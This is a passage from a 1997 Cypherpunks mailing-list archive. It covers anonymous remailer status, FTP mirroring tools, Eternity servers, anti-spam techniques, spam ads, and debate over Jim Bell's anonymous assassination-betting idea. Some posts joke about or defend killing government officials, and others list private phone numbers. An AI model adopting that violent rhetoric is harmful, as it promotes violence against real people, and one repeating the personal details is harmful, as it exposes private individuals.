$remailer{"htuttle"} = " cpunk pgp hash latent cut post ek"; catalyst at netcom.com is _not_ a remailer. lmccarth at ducie.cs.umass.edu is _not_ a remailer. usura at replay.com is _not_ a remailer. remailer at crynwr.com is _not_ a remailer. There is no remailer at relay.com. Groups of remailers sharing a machine or operator: (cyber mix reno winsock) (weasel squirrel medusa) (cracker redneck) (nym lcs) (valdeez arrid hera) The remailer list here has been out of date for some time, but should be up to date now. I'm still working on updating the web page. Last update: Mon 18 Aug 97 6:46:07 PDT remailer email address history latency uptime ----------------------------------------------------------------------- redneck config at anon.efga.org #++-*##*#+** 3:33 100.00% nym config at nym.alias.net --####*+++## 11:49 100.00% cracker remailer at anon.efga.org +++-++++++++ 25:00 99.98% weasel config at weasel.owl.de +-----++--++ 2:12:01 99.96% winsock winsock at rigel.cyberpass.net -.-------+-+ 3:57:20 99.95% cyber alias at alias.cyberpass.net **+-+-+++**+ 17:30 99.86% mix mixmaster at remail.obscura.com +*+-+-+++*+* 28:02 99.84% replay remailer at replay.com ***-**++ *** 7:51 99.67% valdeez valdeez at juno.com _ *-++--- 22:11:38 99.21% arrid arrid at juno.com --+-++++-++ 1:31:52 98.87% bureau42 remailer at bureau42.ml.org +------ 2:26:04 98.46% reno middleman at cyberpass.net -- ++- 1:17:17 98.14% hera goddesshera at juno.com ---------- 5:28:32 96.11% squirrel mix at squirrel.owl.de -.------ 3:57:26 93.98% neva remailer at neva.org -- -*- ---*# 2:13:06 93.34% jam remailer at cypherpunks.ca -- +*- ---** 2:24:34 92.40% History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. ek Encrypt responses in reply blocks using Encrypt-Key: header. special Accepts only pgp encrypted messages. mix Can accept messages in Mixmaster format. reord Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself. mon Remailer has been known to monitor contents of private email. filter Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering. Raph Levien From apb at iafrica.com Mon Aug 18 08:06:10 1997 From: apb at iafrica.com (Alan Barrett) Date: Mon, 18 Aug 1997 23:06:10 +0800 Subject: FTP site mirroring script In-Reply-To: <3.0.2.32.19970818044933.006f82d8@netcom10.netcom.com> Message-ID: > Would somebody please point me to a solid FTP site mirroring script? I know of two: Lee McLoughlin's "mirror", written in Perl, is a highly configurable FTP mirror. Features include recursive subdirectory fetching, regular expression include/exclude filter, on the fly compression. Get it from ftp://src.doc.ic.ac.uk/. GNU "wget", written in C, can do FTP and HTTP mirroring. Features include recursive subdirectory fetching (for FTP), recursive link following (for HTTP/HTML), limited include/exclude filter, converting embedded references in HTML documents from absolute to relative URLs. Get it from ftp://ftp.gnu.ai.mit.edu/. --apb (Alan Barrett) From alan at ctrl-alt-del.com Mon Aug 18 08:33:28 1997 From: alan at ctrl-alt-del.com (Alan) Date: Mon, 18 Aug 1997 23:33:28 +0800 Subject: FTP site mirroring script In-Reply-To: Message-ID: On Mon, 18 Aug 1997, Alan Barrett wrote: > > Would somebody please point me to a solid FTP site mirroring script? > > I know of two: > > Lee McLoughlin's "mirror", written in Perl, is a highly configurable > FTP mirror. Features include recursive subdirectory fetching, > regular expression include/exclude filter, on the fly compression. > Get it from ftp://src.doc.ic.ac.uk/. Be careful of the 2.8 archive of this code. It is not complete. If you do decide to use it, install 2.3 first. (It has the missing code.) I have used both versions. The only problem it has is that it does not check to see if you have enough drive space before executing the code. The program can also be found in any of the CPAN archives. alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply Alan Olsen | to my mail, just hit the ctrl, alt and del keys. From blackjack at hotmail.com Tue Aug 19 00:20:35 1997 From: blackjack at hotmail.com (blackjack at hotmail.com) Date: Tue, 19 Aug 1997 00:20:35 -0700 (PDT) Subject: Your newsgroup post ... Message-ID: <199708190717.AAA24426@lioness.95net.com> Saw your post in the newsgroups. Check this out! http://www.geocities.com/Eureka/Plaza/1022 From sunder at brainlink.com Mon Aug 18 09:23:55 1997 From: sunder at brainlink.com (Ray Arachelian) Date: Tue, 19 Aug 1997 00:23:55 +0800 Subject: New use for Eternity Server In-Reply-To: <33F7ABE9.1820A4D1@count04.mry.scruznet.com> Message-ID: On Sun, 17 Aug 1997, kelly wrote: > Maybe someone should feed the pgp 5.0i sources to a c to HTML converter > and post the output to > the eternity servers.. Why bother? Just prepend a

 tag to each file and you're set. :)

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From alan at ctrl-alt-del.com  Mon Aug 18 09:43:47 1997
From: alan at ctrl-alt-del.com (Alan)
Date: Tue, 19 Aug 1997 00:43:47 +0800
Subject: New use for  Eternity Server
In-Reply-To: 
Message-ID: 



On Mon, 18 Aug 1997, Ray Arachelian wrote:

> On Sun, 17 Aug 1997, kelly wrote:
> 
> > Maybe someone should feed the pgp 5.0i sources to a c to HTML converter
> > and post the output to
> > the eternity servers..
> 
> Why bother?  Just prepend a 
 tag to each file and you're set. :)

Uh, not exactly...

The web browser will not show the code correctly.  (It will have problems
with > and <, for example.)  I guess it depends if you want it for display
or for execution.

A web interface for source code or executable content is difficult to do
well.  (Just try using the CPAN archives via http for a good example.)

Maybe the eternity documents need to have some sort of content header.

alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.






From zooko at xs4all.nl  Mon Aug 18 09:48:09 1997
From: zooko at xs4all.nl (Zooko Journeyman)
Date: Tue, 19 Aug 1997 00:48:09 +0800
Subject: write up AP for FC++
Message-ID: <199708181632.SAA09272@xs2.xs4all.nl>




 A million monkeys operating under the pseudonym
 "Steve Schear " typed:
>
> May I suggest that we abandon the term AP, as being too narrowly focused,
> and use something more academic (looks better in FC's proceedings, anyway)
> such as Anonymous Betting Pools, or some such?



> Definitely.  Also, a legal treatment would be nice (Broiles?).  I've
> posited that ABPs rely on elements of skill rather than chance to avoid
> being tagged as gambling (e.g., Beat the Psychics).  Actually ABP could be
> viewed as an insurance policy.


Um, as soon as you broaden AP from libertarian fantasy into 
rigorous hypothesis, it turns out that it _isn't_ _anything_
but Idea Futures/insurance/ABPs/(payee-anonymous) contract 
markets plus the murderous daydream junk.


That is to say, from the rigorous (technical) point of view, 
AP _IS_ Idea Futures _IS_ ABPs _IS_ contract markets _IS_ 
insurance.


TCMay has mentioned before that AP is nothing new...


If you want some scholarly exposition, write up some definitive
treatise on AP/IF/I/ABPs/CMs as such so that in the future 
crackpots who semi-independently come up with the idea won't be
able to tie it to political fantasies or other specific 
would-be-applications in the (un-)popular consciousness.


Zooko, whose prose is JYA'ifying in frustration

P.S.  Allow me to repeat in simple words:  "'ASSASSINATION 
POLITICS' IS NOTHING BUT IDEA FUTURES PLUS CRACKPOT POLITICAL 
FANTASY!"

P.P.S.  I am not a cypherpunk.  I'm only a guest!  I didn't 
know there was marijuana in the brownies, officer!  I didn't 
PGP sign this message.  Nobody saw me do it -- you can't prove
anything.






From alan at ctrl-alt-del.com  Mon Aug 18 10:01:37 1997
From: alan at ctrl-alt-del.com (Alan)
Date: Tue, 19 Aug 1997 01:01:37 +0800
Subject: Canarypunk: Jim Bell in a coalmine
In-Reply-To: <3.0.32.19970817151550.00a36d98@cnw.com>
Message-ID: 



On Sun, 17 Aug 1997, Blanc wrote:

> >From Robert Hettinga:
> 
> >Well, if he's still in there, and Vince Cate is up for it, we can probably
> >give you a scholarship, which, for FC98, means we let you in the door free.
> [.....]   Mostly it's to show that I, and maybe Vince, if
> >not the rest of the FC++ organization, realize that there, for the grace of
> >the net, go us, too, someday, if we don't do something to show that people
> >like Jim Bell, however loony or repugnant their ideas are to us personally,
> >are not alone.
> ........................................................................
> 
> I was kidding, but that's awful nice of you, even if I still must pay for
> the rest of it.   Yes, I'll still go visit JimBob - I'll have to find out
> about his location, hours, etc.    Again, if any of you in this area would
> like to make the trip or meet there, perhaps meeting later as well for
> dinner and scholaryly discussion on the perils of free speech and such,
> please let me know.   

Does any one know if he can have visitors?  Posting the hours he can see
people would be helpful.  (Also what we can and cannot bring him to read
and/or use.)

I might be able to get a bunch of the Portland crowd to make a weekend
trip up there.

alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.






From azur at netcom.com  Mon Aug 18 10:09:03 1997
From: azur at netcom.com (Steve Schear)
Date: Tue, 19 Aug 1997 01:09:03 +0800
Subject: Fw: Re: (Fwd) FWD: Texas Driver's License database on the web
In-Reply-To: 
Message-ID: 



>At 10:32 PM -0500 8/17/97, amp at pobox.com wrote:
>The point that the scum at the texas dept of safety(hows that for orwellian
>in this case) are the ones selling the databases. It is so typical for the
>state to make a law prohibiting someone else to do that which they are
>doing themselves. The solution I gave them was to simply stop selling the
>information, and the situation would resolve itself.
>

Seem to recall that Mike Beketic, 503-325-0861, sells DL databases on CDROM.

--Steve







From alan at ctrl-alt-del.com  Mon Aug 18 10:57:22 1997
From: alan at ctrl-alt-del.com (Alan)
Date: Tue, 19 Aug 1997 01:57:22 +0800
Subject: Canarypunk: Jim Bell in a coalmine
In-Reply-To: 
Message-ID: 



On Sun, 17 Aug 1997, Mac Norton wrote:

> you might consider a webpage that reports on visits, status,
> and so forth.

Or at least how many come from .gov and .mil sites.

> I've always thought his AP stuff silly, but I can't help
> but think it had somethng to do with his arrest and 
> his prosecution.  Perhaps the govt doesn't have a good
> silliness filter.

This is almost certain.

They also do not have much of a connection to a good clueserver either.  

A semi-humorous example of this was when they decided to have then vice
president Quayle in a hotel next to a Science Fiction convention.  The SF
con had to deal with a huge host of SS agents trying to figure out what
was happening and if there was a "threat" for them to stomp on.  (They
were very easy to spot.  They were the ones wearing the suits with the
pink dress shirts. (I guess lack of fashion sense is part of the job.))

At least on role playing game was disrupted by agents questioning the
participants in an overly serious manner.  (They were playing Top Secret
(a spy RPG) and had a scenerio involving assasinations.)

There were many of the SS agents there who *STILL* had no clues by the end
of the weekend...

alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.






From enoch at zipcon.net  Mon Aug 18 11:55:20 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Tue, 19 Aug 1997 02:55:20 +0800
Subject: write up AP for FC++
In-Reply-To: <199708181632.SAA09272@xs2.xs4all.nl>
Message-ID: <19970818184200.31703.qmail@zipcon.net>



A Visitor Writes:

>  A million monkeys operating under the pseudonym
>  "Steve Schear " typed:

> > May I suggest that we abandon the term AP, as being too narrowly focused,
> > and use something more academic (looks better in FC's proceedings, anyway)
> > such as Anonymous Betting Pools, or some such?

I've always been fond of the term "Non-Traditional Wagering" myself. :)

> Um, as soon as you broaden AP from libertarian fantasy into 
> rigorous hypothesis, it turns out that it _isn't_ _anything_
> but Idea Futures/insurance/ABPs/(payee-anonymous) contract 
> markets plus the murderous daydream junk.

How are Idea Futures doing these days?  Have they upgraded to real money
yet?  I recall they used to have a few interesting things in there, like
the first explicit frontal nudity on American television, and a good
algorithm for solving Max 2-SAT. 

> TCMay has mentioned before that AP is nothing new...

AP brings to anonymous contract assassinations the ability of a very large
number of people to contribute small amounts of money to a pool without
explicit collaboration.  As you have said, this is Idea Futures in a
nutshell.  Of course, I suspect the Idea Futures folk would balk at
writing options on the lives of Clinton, Reno, Freeh, or Potts.  Then
again, if armed Federal Agents shot their families, maybe not. :) 

We do really need to put something together on Jim Bell soon.  People have
been asking about my .sig and I am getting tired of relating the long tale
to each and every one of them. 

Could someone take responsibility for getting all the publicly released
documents together in one place and perhaps posting a "Jim Bell Home Page"
to Eternity?

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}






From zooko at xs4all.nl  Mon Aug 18 12:37:04 1997
From: zooko at xs4all.nl (Zooko Journeyman)
Date: Tue, 19 Aug 1997 03:37:04 +0800
Subject: Alex le Heux
Message-ID: <199708181919.VAA19973@xs2.xs4all.nl>




 A million monkeys operating under the pseudonym
 "Alex le Heux " typed:
>



Hey HEY!  It's the man who nearly managed to single-handedly 
derail the PGP legal export hack by playing the block rocking 
beats (all vinyl) which inspired the vacationing hackers to 
spill the drinks on the source books.


But in his defense, he also nurtured the cpunks network in 
between sets.


Welcome to the list!


Zooko the Mysterieux

P.S.  MP3 is coooool.  CDNow.com needs to start selling MP3's 
in return for digital cash small change!

P.P.S.  No really-- I'm _not_ a cypherpunk, because cypherpunks 
appear to be overwhelmed with blind, self-destructive 
bloodlust since 1996 or so.  I'm just here to try talking some
sense into the salvageable ones.






From tcmay at got.net  Mon Aug 18 12:37:24 1997
From: tcmay at got.net (Tim May)
Date: Tue, 19 Aug 1997 03:37:24 +0800
Subject: write up AP for FC++
In-Reply-To: <199708181632.SAA09272@xs2.xs4all.nl>
Message-ID: 



At 9:32 AM -0700 8/18/97, Zooko Journeyman wrote:
...
>Um, as soon as you broaden AP from libertarian fantasy into
>rigorous hypothesis, it turns out that it _isn't_ _anything_
>but Idea Futures/insurance/ABPs/(payee-anonymous) contract
>markets plus the murderous daydream junk.
>
>
>That is to say, from the rigorous (technical) point of view,
>AP _IS_ Idea Futures _IS_ ABPs _IS_ contract markets _IS_
>insurance.

Yes.

>TCMay has mentioned before that AP is nothing new...
>

Yes. And I've just about given up saying this. If Bell wants to believe he
invented anonymous payments, betting markets, idea futures, etc., let him.
(Note that I'm not saying I invented these things, either. However, I've
posted many articles, and included much material in my 1994
"Cyphernomicon," about markets for contract murder, the implications of
untraceability, etc. Adding the "betting on a date that J. Random Fed dies"
is just an obfuscation of the underlying notions.)

David Chaum was well aware of these implications when I talked to him in
1988 about my then-new ideas; several of us have surmised that he has
chosen to downplay such notions, and their implications, for various
reasons. Denning, too, has discussed these ideas, partly in response to a
paper I did for a conference in Monte Carlo (and reprinted in the Internet
Journal, possibly still available on the New someplace under the exact
title "Crypto Anarchy and Virtual Communities").

It was Hal Finney who encountered Bell in a Usenet group, talking about
arranging betting pools on the death dates of people. Bell at that time was
unaware, by his own admission, of blinded cash, anonymous payment systems,
etc. Finney suggested to Bell that he read some of my stuff and that he get
on the Cypherpunks list (or something similar to this...I think Hal sent me
one of Bell's posts, etc., back in the early fall of 1995 or so).

I'm now mildly amused that Bell is being seen as the inventor of anonymous
and untraceable murder markets, with clueless journalists seeking
information on his discovery. But, hey, better he rot in jail than me.

--Tim May


There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From blancw at cnw.com  Mon Aug 18 12:56:44 1997
From: blancw at cnw.com (Blanc)
Date: Tue, 19 Aug 1997 03:56:44 +0800
Subject: Info on Visiting Jim Bell
Message-ID: <3.0.32.19970818124136.00a32088@cnw.com>



I placed several calls searching for info on Jim's location:

.  There are two phone numbers under James Bell in Vancouver, WA - one of
these was not his family, the other one (360/696-3911) is no longer in
service.   

.  He is not in the Tacoma jail, but was moved to the custody of the U.S.
Marshall, physically being held at 
	Kitsap County Correction Center
	614 Division Street
	Port Orchard, WA 98366
	(360) 876-7108

.  Visiting hours are Sat & Sun, and it is up to the inmate to place you on
their "visiting authorization list", providing the days/hours one can
visit.   Then the visitor must make an appointment during the week, 8-12
a.m or 1-4 pm.

.  Visitors must bring a photo ID (drivers license, passport, etc.), and
they must sign-in 15 minutes prior to the actual visit.

.  I don't know yet if more than one person at a time can visit; I expect
each person there can take their 30 minute turn. 

The next step will be for me to write to Jim and have him put myself &
others on his visitors list.

    ..
Blanc
    ..
Blanc






From t.fenk at gmx.net  Mon Aug 18 12:58:45 1997
From: t.fenk at gmx.net (Thorsten Fenk)
Date: Tue, 19 Aug 1997 03:58:45 +0800
Subject: Picketing With Packets
In-Reply-To: <19970816212754.10722.qmail@zipcon.net>
Message-ID: <19970818200210.29899@nostromo.ino.de>

Bill Stewart (stewarts at ix.netcom.com) wrote :

>(...)
> However, that doesn't really block the spammers who buy a list of
> N million targets and send spam out from their own machines,
> though shutting down Spamford and Harris Marketing would help,
> and would cut down the sales of the lists.

Hi,
ever thougt about a "Teergrube" ?

It's a Patch for sendmail (and smail AFAIR).
It works as follows:
sendmail Messages normally look like this

250 nostromo.ino.de Hello fenkt at localhost [127.0.0.1], pleased to meet you

(Numbercode  Human readable Text)

A Minus Sign instead of the  means, that sendmail waits for the 
current receive to finish.
If such messages appear, say every minute, the Connection stays open for
several hours, without a Timeout from the remote host.

A Teergrube controls a therefor prepared MTA to produce such 
messages; depending on an predefined list of IP Numbers.
It doesn't block all mail from the site; it just makes Bulk (maximal
Amount in shortest possible Time) mail very difficult. A single User
from that site can still send mail to your site, the only thing is
the increased amount of time for delivery.
This is opposite to blocking sites (sendmail 8.8.5 *Scheckrules ); which
is just a self-defense, but not a Solution against UBE.

If you want to try it:
ftp://nutsy.han.de/pub/sendmail/

regards
Thorsten

-------------- next part --------------
A non-text attachment was scrubbed...
Name: pgp00002.pgp
Type: application/octet-stream
Size: 463 bytes
Desc: "PGP signature"
URL: 

From 61386135 at usnational243.com  Tue Aug 19 04:14:02 1997
From: 61386135 at usnational243.com (61386135 at usnational243.com)
Date: Tue, 19 Aug 1997 04:14:02 -0700 (PDT)
Subject: FREE $10 PHONE CARD - - NO CATCH ! !
Message-ID: <199708179999@juno.com>



             FREE $10 PHONE CARD

                       NO CATCH

                 BRAND NEW ! ! !

      USA ONLY --- Can Be Used To Call 
             Anywhere In The Country

     To Receive one please send a #10

 Long Self Addressed Stamped Envelope to:


FREE PHONE CARD
BOX 745
BLOOMINGTON, IL  61702



Limit 1 per household.  Tell your friends though ! !






































From nospam-seesignature at ceddec.com  Mon Aug 18 13:23:33 1997
From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com)
Date: Tue, 19 Aug 1997 04:23:33 +0800
Subject: Picketing With Packets
In-Reply-To: <19970816232134.20321.qmail@zipcon.net>
Message-ID: <97Aug18.155614edt.32257@brickwall.ceddec.com>



On Sat, 16 Aug 1997, Mike Duvos wrote:

> dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) writes:
> 
>  > Perhaps this will spark another round of a cypherpunk
>  > discussion of technical solutions to junk e-mail...
> 
> I'm tempted to go some sort of postage route myself, but I
> occasionally get mail from newbies who have never written me
> before, and who occasionally have something interesting to say.

>  > Visit these two sites and jump through the loops:

Actually, two procmail lines manage to move 60-80% of my junkmail to a
folder reserved for just that where I keep track.

The first line is in the header: "X-Advertisement: For removal information
...  www.iemmc.org" or whatever (remove the trailing period if it has one. 

And the second is the Email Blaster advertising banner and fax number in
the body.

And there was DynaMail which also had a fixed advertisement, but I only
got one of those.  And I have a lot more specific filters by processing
the "domains registered to spammers" lists.

Need I say that I am on the IEMMC removal list, or should be - for a long
while they kept rejecting my tokens until I set up an agent which would
keep submitting the form, and forward the mailed token properly.  Then
(after a few hundred) they kept saying it was in the middle of being
processed.

And the X-ad recipie is still finding mail to junk.

--- reply to tzeruch - at - ceddec - dot - com ---






From nospam-seesignature at ceddec.com  Mon Aug 18 13:25:19 1997
From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com)
Date: Tue, 19 Aug 1997 04:25:19 +0800
Subject: Picketing With Packets
In-Reply-To: <55JkBe2w165w@bwalk.dm.com>
Message-ID: <97Aug18.160626edt.32257@brickwall.ceddec.com>



On Sun, 17 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

> Observation 1: it's much easier to get ON their junk mail list
> then to get OFF of it.

There are two lists, or more properly one list - the remove list.  The
"ON" list is whatever cyberbomber or emailblaster, etc. generates.

They are supposed to run the outbound mail through the remove list filter.
And take action against anyone who doesn't.

> Observation 2: if you enter the same userid several times, you
> get several different numbers in the mail; all of them work
> (not just the latest)

All returned numbers give the same effect.  One day that changed from "The
token you entered was invalid, try again or restart with your name" to
"That user id removal is already in progress - please try again in 24
hours". 

--- reply to tzeruch - at - ceddec - dot - com ---






From tcmay at got.net  Mon Aug 18 14:00:48 1997
From: tcmay at got.net (Tim May)
Date: Tue, 19 Aug 1997 05:00:48 +0800
Subject: write up AP for FC++
In-Reply-To: <199708181632.SAA09272@xs2.xs4all.nl>
Message-ID: 



At 11:42 AM -0700 8/18/97, Mike Duvos wrote:

>We do really need to put something together on Jim Bell soon.  People have
>been asking about my .sig and I am getting tired of relating the long tale
>to each and every one of them.

Whom are the "we" in this "We really need to put something together..."?

I certainly don't plan to be part of the "we," and this sounds perilously
close to the notion that members of this mailing list are part of some sort
of collective entity, with goals, charters, action plans, officers, oh my.

As for info on Jim Bell, the article by Declan is widely available, and is
quite informative. As for elaborating it further, or including more
boilerplate, this seems pointless. Anyone knew to the story can read
Declan's article. Anyone seeking even more information presumably knows how
to use search engines and should be able to find the various essays and
articles directly.


>Could someone take responsibility for getting all the publicly released
>documents together in one place and perhaps posting a "Jim Bell Home Page"
>to Eternity?

Sounds good to me. Let us know when you've finished it.

(If I sound testy, sorry. It's just that it's been a while since I've heard
this "we should get together and so suchandsuch" stuff.  The notion that
Cypherpunks are some sort of collective is not real useful. Nor is building
a page devoted to Bell's "one trick pony" terribly interesting. Yes, people
are clueless and ask "Who is Jim Bell?" So? Tell them to use search
engines; a HotBot search on "James Dalton Bell" just returned 1078 matches,
several of them on the first page directly applicable. Obviously various
Boolean searches on AP, Bell, IRS, etc. would act in the predictable way.)

--Tim May


There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From sunder at brainlink.com  Mon Aug 18 14:09:39 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Tue, 19 Aug 1997 05:09:39 +0800
Subject: New use for  Eternity Server
In-Reply-To: 
Message-ID: 



On Mon, 18 Aug 1997, Alan wrote:

> Uh, not exactly...
> 
> The web browser will not show the code correctly.  (It will have problems
> with > and <, for example.)  I guess it depends if you want it for display
> or for execution.

I've never had a problem (using Netscape) just simply opening up .c
files directly.  It recognizes it's not HTML and display's the < and > (as
in #include  fine.

However, you're right about the 
 tags, using them won't work. :)  Not
using them works better... though having a filter will do the trick I
guess...  Mispoke before.... the #includes show up without the 
info...

> Maybe the eternity documents need to have some sort of content header.

Or better yet, just compress the damn things with GZIP or ZIP, or
whatever, and have the servers handle them as binaries.  Would work better
in the long run anyway since it will waste less space.

Can current eternity servers handle plain binaries?

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From alan at ctrl-alt-del.com  Mon Aug 18 14:34:20 1997
From: alan at ctrl-alt-del.com (Alan)
Date: Tue, 19 Aug 1997 05:34:20 +0800
Subject: New use for  Eternity Server
In-Reply-To: 
Message-ID: 



On Mon, 18 Aug 1997, Ray Arachelian wrote:

> On Mon, 18 Aug 1997, Alan wrote:
> 
> > Uh, not exactly...
> > 
> > The web browser will not show the code correctly.  (It will have problems
> > with > and <, for example.)  I guess it depends if you want it for display
> > or for execution.
> 
> I've never had a problem (using Netscape) just simply opening up .c
> files directly.  It recognizes it's not HTML and display's the < and > (as
> in #include  fine.

This is because it is defaulting to text/plain for the mime-type.  

> However, you're right about the 
 tags, using them won't work. :)  Not
> using them works better... though having a filter will do the trick I
> guess...  Mispoke before.... the #includes show up without the 
> info...

If you think that is bad, try using segments of Perl code between 
and/or code tags...  Mangle does not quite describe it well enough.

> > Maybe the eternity documents need to have some sort of content header.
> 
> Or better yet, just compress the damn things with GZIP or ZIP, or
> whatever, and have the servers handle them as binaries.  Would work better
> in the long run anyway since it will waste less space.

This assumes that the user has support for those compression formats.  (I
run into this too much with Solaris and Windows, for various reasons.)

> Can current eternity servers handle plain binaries?

And if they do, what encoding format do they support?  (Mime, Base-64,
and/or uuencode.)

alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.






From aba at dcs.ex.ac.uk  Mon Aug 18 17:02:03 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Tue, 19 Aug 1997 08:02:03 +0800
Subject: New use for  Eternity Server
In-Reply-To: 
Message-ID: <199708182307.AAA00846@server.test.net>




Alan  writes:
> > Or better yet, just compress the damn things with GZIP or ZIP, or
> > whatever, and have the servers handle them as binaries.  Would work better
> > in the long run anyway since it will waste less space.
> 
> This assumes that the user has support for those compression formats.  (I
> run into this too much with Solaris and Windows, for various reasons.)
> 
> > Can current eternity servers handle plain binaries?
> 
> And if they do, what encoding format do they support?  (Mime, Base-64,
> and/or uuencode.)

It should support pretty much anything.  Just treat eternity documents
like standard web documents...  Anything you can do in a web document
you can do in a web document stored in eternity.  (Except, eternity
doesn't host your cgi's for you :-)

If you want a .zip file, well link to it like this:

	pgp50i.zip 

if you want to reference it in an eternity document.  Submit the .zip
file the same way you would a .html file or .gif file.

(Eternity supports relative, site relative and absolute URLs).

You could also use the url for the zip file directly:

	http://pgp.eternity/pgp50i.zip

Or use lynx to download it:

	lynx -dump http://www.replay.com/aba/cgi-bin/eternity.cgi?url=http://pgp.eternity/pgp50i.zip > pgp50i.zip

Or whatever.

However pgp50i isn't censored outside the US, so why not just download
it from Stale's site in Norway?

(You could view the ITAR/EAR restrictions as censorship of those
wishing to publish pgp inside the US... but the simple solution is
jurisdiction shopping... anywhere but the US, Iraq, etc).

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0



Tim May wrote:

>I'm now mildly amused that Bell is being seen as the inventor of anonymous
>and untraceable murder markets, with clueless journalists seeking
>information on his discovery. But, hey, better he rot in jail than me.
.......................................................

A presentation from you at FC98 would remind everyone of your own initial
writings on the subject and provide you with due credit (better credit than
a jail/rotting sentence).   I can't think of anyone else who would be more
qualified for this.

   ..
Blanc
    ..
Blanc






From aba at dcs.ex.ac.uk  Mon Aug 18 17:15:33 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Tue, 19 Aug 1997 08:15:33 +0800
Subject: bloodlust or game-theory? (was Re: Alex le Heux)
In-Reply-To: <199708181919.VAA19973@xs2.xs4all.nl>
Message-ID: <199708182326.AAA00880@server.test.net>




Zooko Journeyman  writes:
> [...]
>
> P.P.S.  No really-- I'm _not_ a cypherpunk, because cypherpunks 
> appear to be overwhelmed with blind, self-destructive 
> bloodlust since 1996 or so.  I'm just here to try talking some
> sense into the salvageable ones.

Cypherpunks are individuals.

Pick 10 cypherpunks, you'll get 10 different views.

Don't see the need to disclaim non-cypherpunk status due to
`bloodlust'...  Are you anticipating that the list readership will be
collectively locked up for non-government approved thoughts?

Are you sure that having a 10 mile crater where there used to be a
bunch of power-crazed beaurocrats wouldn't be a net improvement :-)?

It's not as if anyone is planning to nuke them anyway, it's just
invective.  There might be some danger of some of us writing a bit of
crypto code, or saying some negative things about politicians.  No
laws against either of those (yet).

On AP/betting pools etc., politics and governments are all about
force.  Why should governments have a monopoly on force?  People
applaud SAS/CIA assassinations as humanitarian efforts.  What's the
difference?

A lot of the systematic torture, intimidation, carried out by 3rd
world dictatorships is done at the hands of CIA trained government
employees.

If you find your own government not extreme enough to feel comfortable
evaluating net benefits to human happiness in removal of corrupt
government officials, perhaps you would be happier evaluating societal
benefits of theoretically removing some 3rd world countries more
corrupt officials.

It's not bloodlust, it's game theory...

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0



Test







From jya at pipeline.com  Mon Aug 18 17:18:11 1997
From: jya at pipeline.com (John Young)
Date: Tue, 19 Aug 1997 08:18:11 +0800
Subject: RSA v. PGP Docs
